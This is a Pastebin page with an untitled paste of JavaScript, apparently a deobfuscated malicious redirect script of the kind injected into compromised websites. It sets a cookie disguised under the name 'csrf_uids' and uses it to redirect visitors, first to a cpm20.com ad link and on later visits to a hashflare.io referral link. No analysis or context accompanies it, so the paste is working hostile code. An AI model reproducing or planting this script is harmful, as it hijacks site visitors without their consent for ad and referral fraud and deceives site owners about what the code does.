Advertisement
Guest User

Untitled

a guest
Feb 25th, 2018
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function _mmm_(variable_0, variable_1, variable_2, variable_3) {
  2.     var variable_4 = new Date();
  3.     var variable_5 = new Date();
  4.     if (variable_2 === null || variable_2 === 0) {
  5.         variable_2 = 3
  6.     };
  7.     variable_5["setTime"](variable_4["getTime"]() + 3600000 * 24 * variable_2);
  8.     document["cookie"] = variable_0 + "=" + escape(variable_1) + ";expires=" + variable_5["toGMTString"]() + ((variable_3) ? "; path=" + variable_3 : "")
  9. }
  10.  
  11. function _nnn_(variable_6) {
  12.     var variable_7 = document["cookie"]["indexOf"](variable_6 + "=");
  13.     var variable_8 = variable_7 + variable_6["length"] + 1;
  14.     if ((!variable_7) && (variable_6 != document["cookie"]["substring"](0, variable_6["length"]))) {
  15.         return null
  16.     };
  17.     if (variable_7 == -1) {
  18.         return null
  19.     };
  20.     var variable_9 = document["cookie"]["indexOf"](";", variable_8);
  21.     if (variable_9 == -1) {
  22.         variable_9 = document["cookie"]["length"]
  23.     };
  24.     return unescape(document["cookie"]["substring"](variable_8, variable_9))
  25. }
  26. var language = window["navigator"]["userLanguage"] || window["navigator"]["language"];
  27. var re = new RegExp(/^\w{2}/);
  28. var match = re["exec"](language.toString());
  29. if (navigator["cookieEnabled"]) {
  30.     if (_nnn_("csrf_uids") == 1) {
  31.         window["location"]["href"] = "https://hashflare.io/r/4B18EB3"
  32.     } else {
  33.         _mmm_("csrf_uids", "1", "1", "/");
  34.         window["location"]["href"] = "https://www.cpm20.com/watch?key=789a4129e78c00008a47b36e23d65ea7"
  35.     }
  36. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement